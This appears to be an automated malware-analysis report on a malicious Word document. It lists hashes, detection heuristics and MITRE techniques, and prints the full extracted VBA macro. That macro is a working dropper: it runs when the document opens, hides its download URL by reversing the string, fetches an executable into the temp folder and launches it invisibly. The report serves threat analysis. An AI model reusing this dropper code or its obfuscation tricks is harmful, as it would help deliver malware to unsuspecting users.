Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 77fca797d90ba2d5…

MALICIOUS

Office (OOXML)

174.7 KB Created: 2019-01-31 22:06:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2020-01-07
MD5: 855c477845661648ddc408f411a98649 SHA-1: 62917e3b239fdf1ea9caf4594afe0c7cf763120d SHA-256: 77fca797d90ba2d575fe7bc6620209cd9151a290a72dbc3b352e1c7180bdf9dc
298 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a malicious Office document containing a VBA macro. The macro utilizes WScript.Shell and CreateObject to download and execute a second-stage payload, as indicated by the OLE_VBA_HTTP_DROP_EXEC heuristic. The Document_Open macro is automatically executed upon opening the document, initiating the malicious chain.

Heuristics 9

  • ClamAV: Doc.Dropper.Agent-7100814-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7100814-0
  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set w = CreateObject("WScript.Shell")
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
            .Write r.ResponseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set w = CreateObject("WScript.Shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Public Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
     s = Environ$(Chr(116) & Chr(101) & Chr(109) & Chr(112)) & "\" & StrReverse("exe.cod")
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 10568 bytes
SHA-256: b9f54c91495ae87608a9489ddad70fc68cebfe47403440a48665aa236ff16f12
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub Document_Open()

AA5stdi0z31nl
End Sub


Attribute VB_Name = "zz0tqf1kawi"


Public Sub ystelxijbhl()

Dim ryoyy5jl4bk As String
Dim AA5mjnsxwdsne As String
Dim ferrw0uue05 As String
Dim z3h5qzf2zox As String
Dim AA4n1zrse3n1w As String
Dim uujdof3ylez As String
Dim AA51nxjwnem50 As String
Dim ghi4jmnhlf2 As String
Dim bbw3lqu2tf3 As String
Dim ibmulzvawgp As String
Dim o0502znz0r1 As String
Dim leipjrkdl0k As String
Dim pvp1oyygms4 As String
Dim znk14mtnb3g As String
Dim qn0d3voqeur As String
Dim AA0zcutnoc1jf As String
Dim tyyr2cfx1rt As String
Dim qqibi3iwdmz As String
Dim vaqt4rvb3xv As String
Dim vvpy4ekknjr As String
End Sub

Public Sub AA2c15gkukivm()

Dim zdm4xaatoxj As String
Dim mrbmaqk4rc3 As String
Dim rbq05u1zs0t As String
Dim eggah01y4ji As String
Dim wjodpe34jpe As String
Dim AA44s3u3kvzwz As String
Dim qnmdw2frckr As String
Dim o3rpqf1jqdk As String
Dim hakg2i3fwjw As String
Dim AA5lcggy2jndi As String
Dim r31ox5zgxdw As String
Dim jrio0qyu4ml As String
Dim vjiduouz5is As String
Dim gfhrnftmuep As String
Dim qpjjlcyfy2g As String
Dim zlmwmjyhndp As String
Dim ceoxm0crriz As String
Dim l4fqjtxqf11 As String
Dim AA3lxqenjypb5 As String
Dim j24xrk4vpia As String
End Sub

Public Sub AA1actmzztfur()

Dim d5va01ukd4h As String
Dim sr5iyvt1msp As String
Dim besup0vf3se As String
Dim wnzsoeo3cm5 As String
Dim d4kqhfwyyav As String
Dim AA4oxpfqg5414 As String
Dim AA2idjwdtmtgi As String
Dim loz0ndcb3is As String
Dim i1zun1guglc As String
Dim steov0xngcz As String
Dim gih2q3akwzx As String
Dim AA4yt3iglftaa As String
Dim w251xlr1b44 As String
Dim wwoteojabzz As String
Dim ibkbkkjd34v As String
Dim AA0aqkpt44npk As String
Dim AA3hd5tvtzwtj As String
Dim v124rvijku3 As String
Dim igfxsibpmir As String
Dim kaadddu3ab1 As String
End Sub

Public Sub w2clvzyjc21()

Dim kdhqk1ctzk3 As String
Dim AA3gzj0wquh5j As String
Dim AA2a0w2iflen5 As String
Dim lv1dm53etks As String
Dim xru22pdniqt As String
Dim gluxqqeieue As String
Dim AA3t2amo4nrxw As String
Dim t2o3xzhzfmu As String
Dim ruti1irwdyk As String
Dim uk5sqhyifcj As String
Dim kvyyjuiqqc1 As String
Dim AA1qppdt0o31m As String
Dim jglzqafesvw As String
Dim elic0jydrpw As String
Dim etusq2mot1f As String
Dim cizgmy0egiz As String
Dim z2x22q2dcie As String
Dim n4fr14mgrhi As String
Dim AA1xajqin25ff As String
Dim twj04ijqs1d As String
End Sub

Public Sub hpsv420vsy5()

Dim gcmyrduf4iv As String
Dim qh2sr2rrnd1 As String
Dim AA31zjmsr3b02 As String
Dim t2xewbtuzsh As String
Dim vvsppzu5nxx As String
Dim rfioiidcawh As String
Dim yoirmyc0zuf As String
Dim dcoftgrhypg As String
Dim f4i2kb4gnzu As String
Dim lbs10xzafij As String
Dim lclgtbqipd0 As String
Dim zbupahtxe0o As String
Dim AA3s5g4qs5ah5 As String
Dim vdknc4tftrf As String
Dim neo5scxlc2t As String
Dim n0cy1nudg5i As String
Dim AA0eyjlxasjur As String
Dim ekyduq5sp4o As String
Dim lyhtjbg5jn0 As String
Dim AA0zdk4flrddm As String
End Sub

Public Sub d0mm43bey2u()

Dim qx2bsar54y3 As String
Dim u10ri3u5j1b As String
Dim kmadxg1sgj5 As String
Dim nzyqt4djdwr As String
Dim ukuhw4hxgzz As String
Dim hkuakvszy2k As String
Dim AA1mjshabjpck As String
Dim laikffh4q2v As String
Dim wg10dxqs1g0 As String
Dim bqmtopyny3e As String
Dim sti4mobbhro As String
Dim xggz5bi3krg As String
Dim o4rjtytb5p0 As String
Dim ylywhvvzffs As String
Dim wiilonjmjkp As String
Dim sfq1rbiw0xj As String
Dim AA2mh5t2hwrlf As String
Dim au4ay5drzwa As String
Dim lp0kzcpoflh As String
Dim yu3ppeapzqi As String
End Sub

Public Sub dxpgfmr4ngc()

Dim uidlbulvy0q As String
Dim aohgb22dt32 As String
Dim upgg0qrex4i As String
Dim ay53ys5njgz As String
Dim z2bcrlpicfp As String
Dim vwn2ibwy32n As String
Dim k13d0ta02i4 As String
Dim AA4w4si12nusi As String
Dim AA3hsxejnd0cj As String
Dim p1f0j5kedgb As String
Dim szkby0ykxfu As String
Dim sg3jp3ax4je As String
Dim cwer0v3tshj As String
Dim AA1wa3u3dnhav As String
Dim zhtt1xklkom As String
Dim wmcaldgea1r As String
Dim kak1ayktxxn As String
Dim axhpacl315n As String
Dim AA13mwhayup3l As String
Dim ti2dl2rhi2m As String
End Sub

Public Sub AA3hzbdo3zrlc()

Dim okulfrrc52j As String
Dim AA5vcoet3waxr As String
Dim vf5dqom1rjn As String
Dim c42e4j3gkt5 As String
Dim AA3btkxi3xzve As String
Dim enqsimcfyvx As String
Dim AA2shyckbnl3u As String
Dim cwxb4vr3nx4 As String
Dim AA23gbmpcl2x1 As String
Dim qwlwdu5ypyw As String
Dim ve35bc4ov4b As String
Dim uspxsj252dp As String
Dim x2qmaxsoe4y As String
Dim xow0eu5plpt As String
Dim ao1ox4dbgqd As String
Dim fdt1flixqxg As String
Dim byxz3g3i2qb As String
Dim etplbv012ks As String
Dim vefatc3g4u2 As String
Dim dfde3mpui4x As String
End Sub

Public Sub uztmibscdwv()

Dim AA4hj3wb2ybxc As String
Dim x3tzcedpzes As String
Dim rgobiagljjd As String
Dim swdsnans25o As String
Dim AA3vwulrbj2om As String
Dim alk50ucpyz0 As String
Dim ta0goqiz3ft As String
Dim vlcetau2nvq As String
Dim AA5jnryiaggbj As String
Dim szz1uzx4pvi As String
Dim ds5nlta4n0h As String
Dim d0jirgvgrri As String
Dim epc3030qmlc As String
Dim AA1uu0pwfwml4 As String
Dim AA3n0yfnit0ta As String
Dim u4a21xqzkrt As String
Dim hnu4f5ona5i As String
Dim oki35hijoej As String
Dim ekottvl4so4 As String
Dim d2xcxqipyw3 As String
End Sub

Public Sub kstbzhpt2tk()

Dim AA32t3woyl3ot As String
Dim uzfsalldq5k As String
Dim mj51suyfsqb As String
Dim cq2cag5vw2e As String
Dim y5mclcjibop As String
Dim AA31dy13go3ra As String
Dim AA5lafkojc1c2 As String
Dim scg2sima3e3 As String
Dim AA205y255rxzp As String
Dim AA42pkxp30w22 As String
Dim d5b0mckxw0j As String
Dim b1tpatr3gxp As String
Dim be44omt4p2g As String
Dim ur0xjn134g5 As String
Dim AA2ke2u1rbbfb As String
Dim f4etpt4fjrs As String
Dim ycrxe3eix1z As String
Dim hwnqxbdkva1 As String
Dim o0g4z1sp43l As String
Dim a2miergzpng As String
End Sub




Sub AA5stdi0z31nl()

 Dim s As String

 l = "exe.egami/tnetnoc-pw/lc.yloportem//:ptth"

  On Error Resume Next
 
Dim ob2dua5uope As String
Dim AA14kaks04vhr As String
Dim u3tut2sh5ta As String
Dim qebkzzladvb As String
Dim pch1gp2p025 As String
Dim sru2gzci0on As String
Dim AA3qfa0p0sser As String
Dim AA1t1gzn5kqsu As String
Dim zwaulqjotbo As String
Dim fnmg405sk13 As String
Dim rlcsqwrjkeh As String
Dim iburpnfsf1w As String
Dim mma3fskvkvl As String
Dim x0kv5fxf3qy As String
Dim gjaet22ap2g As String
Dim jsg2agy31y1 As String
Dim zs4qmtlizao As String
Dim dygp42hfkb4 As String
Dim u5o5ta41dmn As String
Dim n4ou4co5jrj As String

 s = Environ$(Chr(116) & Chr(101) & Chr(109) & Chr(112)) & "\" & StrReverse("exe.cod")
 

 adding StrReverse(l), s
 substracnoop s, ""
 
 End
End Sub
Sub substracnoop(f, a)

 On Error Resume Next
 
 Dim ob2dua5uope As String
Dim AA14kaks04vhr As String
Dim u3tut2sh5ta As String
Dim qebkzzladvb As String
Dim pch1gp2p025 As String
Dim sru2gzci0on As String
Dim AA3qfa0p0sser As String
Dim AA1t1gzn5kqsu As String
Dim zwaulqjotbo As String
Dim fnmg405sk13 As String
Dim rlcsqwrjkeh As String
Dim iburpnfsf1w As String
Dim mma3fskvkvl As String
Dim x0kv5fxf3qy As String
Dim gjaet22ap2g As String
Dim jsg2agy31y1 As String
Dim zs4qmtlizao As String
Dim dygp42hfkb4 As String
Dim u5o5ta41dmn As String
Dim n4ou4co5jrj As String


Set w = CreateObject("WScript.Shell")
w.Run f & " " & a & " ", INVISIBLE, NOWAIT
End Sub
 Sub adding(u, f)
 On Error Resume Next
 
 Dim ob2dua5uope As String
Dim AA14kaks04vhr As String
Dim u3tut2sh5ta As String
Dim qebkzzladvb As String
Dim pch1gp2p025 As String
Dim sru2gzci0on As String
Dim AA3qfa0p0sser As String
Dim AA1t1gzn5kqsu As String
Dim zwaulqjotbo As String
Dim fnmg405sk13 As String
Dim rlcsqwrjkeh As String
Dim iburpnfsf1w As String
Dim mma3fskvkvl As String
Dim x0kv5fxf3qy As String
Dim gjaet22ap2g As String
Dim jsg2agy31y1 As String
Dim zs4qmtlizao As String
Dim dygp42hfkb4 As String
Dim u5o5ta41dmn As String
Dim n4ou4co5jrj As String


  Set r = CreateObject("WinHttp.WinHttpRequest.5.1")
 r.Open "GET", u, False
 r.Send
 
 Dim pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej As String
Dim aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf As String
Dim zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr As Integer
Dim a2r8nz6hlum7lxam2eq2ygfmams69j1p2rkr1upchwbmk2zonf As Long
Dim jthbyjh5idr2rt1r7v8bftmm617ow54tdcj4tcx9rr4hyqyyky As Integer

pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej = "b9hk3rworqvbit1w66ky2iloq2eg6s9rvxbdouxperze4ikd8g353"
aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "gkdhrltvqivm32wvcb3mrfo6d7x6a2xp9hsqji6o3cu0jiwr923148"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1259
a2r8nz6hlum7lxam2eq2ygfmams69j1p2rkr1upchwbmk2zonf = 837
For jthbyjh5idr2rt1r7v8bftmm617ow54tdcj4tcx9rr4hyqyyky = 0 To 5
pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej = "a6wqfhp552gynsfhwndl88m8h6l8yjbipmgdsp0wjh441b5nr45520"
aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "aniunjxmasv1ua2wclxs4abkb0rivhksa2ysy7e8qv0yqiqj8t3146"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1841
a2r8nz6hlum7lxam2eq2ygfmams69j1p2rkr1upchwbmk2zonf = 1745
Next jthbyjh5idr2rt1r7v8bftmm617ow54tdcj4tcx9rr4hyqyyky


 Set fs = CreateObject("Scripting.FileSystemObject")
  If fs.FileExists(f) Then
    fs.DeleteFile (f)
  End If
  
  aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "aniunjxmasv1ua2wclxs4abkb0rivhksa2ysy7e8qv0yqiqj8t3146"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1841
a2r8nz6hlum7lxam2eq2ygfmams69j1p2rkr1upchwbmk2zonf = 1745
'Next jthbyjh5idr2rt1r7v8bftmm617ow54tdcj4tcx9rr4hyqyyky

  If r.Status = 200 Then
    Set st = CreateObject("ADODB.Stream")
    
    
    pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej = "b9hk3rworqvbit1w66ky2iloq2eg6s9rvxbdouxperze4ikd8g353"
aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "gkdhrltvqivm32wvcb3mrfo6d7x6a2xp9hsqji6o3cu0jiwr923148"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1259


    With st
        .Type = 1
        .Open
        .Write r.ResponseBody
        .SaveToFile f
        .Close
    End With
    Set st = Nothing
  End If
 End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 35328 bytes
SHA-256: 81ce51c1164164561ca131d560bae770cf0f9d415528f98f4003b40c000ebc1e

Open this report in the interactive analyzer, or submit your own file for analysis.